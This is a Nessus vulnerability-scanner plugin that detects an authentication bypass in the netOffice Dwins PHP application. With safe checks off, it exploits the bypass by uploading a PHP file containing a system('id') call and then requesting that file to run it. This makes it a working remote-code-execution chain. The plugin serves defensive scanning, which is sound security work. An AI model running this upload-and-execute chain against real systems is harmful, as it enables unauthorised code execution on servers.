#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31342);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(28051);

  script_name(english:"netOffice Dwins Authentication Bypass Vulnerability");
  script_summary(english:"Accesses the 'Upload a File' form");

  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
an authentication bypass vulnerability. 

Description :

The remote host is running netOffice Dwins, an open-source project
management application written in PHP. 

The version of netOffice Dwins installed on the remote host allows an
attacker to bypass authentication and access parts of the affected
application to which he would not ordinarily have access to by setting
the 'demoSession' request parameter to '1'.  One possible means of
attack this reportedly allows is for uploading of arbitrary PHP files
to be executed on the remote host, subject to the privileges under
which the web server operates. 

See also :

http://www.securityfocus.com/archive/1/488958/30/0/threaded

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/netofficedwins", "/netoffice", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to bypass authentication and get the "Upload a File" form.
  url = string(dir, "/projects_site/uploadfile.php");

  req = http_get(
    item:string(url, "?demoSession=1"), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If we get the form...
  if ('method="POST" action="../projects_site/uploadfile.php?action=add' >< res)
  {
    # We're done if safe checks are enabled.
    if (safe_checks())
    {
      report = string(
        "Note that Nessus did not actually check if it was possible to leverage\n",
        "this issue to upload arbitrary PHP files because the Safe Checks\n",
        "setting was in effect when this scan was run.\n"
      );
    }
    # Try to exploit the issue to upload a file and then execute it.
    else
    {
      cmd = "id";
      fname = string(SCRIPT_NAME, "-", rand(), ".php");

      boundary = "nessus";
      req = string(
        "POST ",  url, "?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor HTTP/1.1\r\n",
        "Host: ", get_host_name(), "\r\n",
        "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
        "Content-Type: multipart/form-data; boundary=", boundary, "\r\n"
        # nb: we'll add the Content-Length header and post data later.
      );
      boundary = string("--", boundary);
      postdata = string(
        boundary, "\r\n", 
        'Content-Disposition: form-data; name="upload"; filename="', fname, '"', "\r\n",
        "Content-Type: application/octet-stream\r\n",
        "\r\n",
        '<?php system(', cmd, "); # generated by the Nessus plugin ', SCRIPT_NAME, ' ?>\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="MAX_FILE_SIZE"', "\r\n",
        "\r\n",
        "100000000\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="submit"', "\r\n",
        "\r\n",
        "Save\r\n",

        boundary, "--", "\r\n"
      );
      req = string(
        req,
        "Content-Length: ", strlen(postdata), "\r\n",
        "\r\n",
        postdata
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
      if (res == NULL) exit(0);

      # Get a listing of files.
      req = http_get(
        item:string(dir, "/projects_site/doclists.php?demoSession=1"), 
        port:port
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      uploaded_file = NULL;
      pat = string('">([0-9]+--', fname, ')<');
      matches = egrep(pattern:pat, string:res);
      if (matches) 
      {
        foreach match (split(matches)) 
        {
          match = chomp(match);
          item = eregmatch(pattern:pat, string:match);
          if (!isnull(item))
          {
            uploaded_file = item[1];
            break;
          }
        }
      }

      # Now try to run the command.
      if (isnull(uploaded_file))
      {
        report = string(
          "Nessus was unable to exploit this issue even though the installed\n",
          "version of netOffice Dwins appears vulnerable.\n"
        );
      }
      else
      {
        req = http_get(
          item:string(dir, "/files/", uploaded_file), 
          port:port
        );
        res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res == NULL) exit(0);

        if (
          # the output looks like it's from id or...
          egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res) ||
          # PHP's disable_functions prevents running system().
          egrep(pattern:"Warning.+ has been disabled for security reasons", string:res)
        )
        {
          if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res))
          {
            report = string(
              "Nessus was able to execute the command '", cmd, "' on the remote host by\n",
              "uploading a file with PHP code and then calling it using the URL :\n",
              "\n",
              "  ", dir, "/files/", uploaded_file, "\n",
              "\n",
              "It produced the following results :\n",
              "\n",
              "  ", res
            );
          }
        }

        if (isnull(report))
        {
          report = string(
            "Nessus was unable to exploit this issue even though the installed\n",
            "version of netOffice Dwins appears vulnerable.  Look in the 'files'\n",
            "directory, under the netOffice Dwins installation directory, on the\n",
            "remote host for a file with the following name :\n",
            "\n",
            "  ", uploaded_file, "\n"
          );
        }
      }
    }

    if (report_verbosity) security_hole(port:port, extra:string("\n", report));
    else security_hole(port);
    exit(0);
  }
}
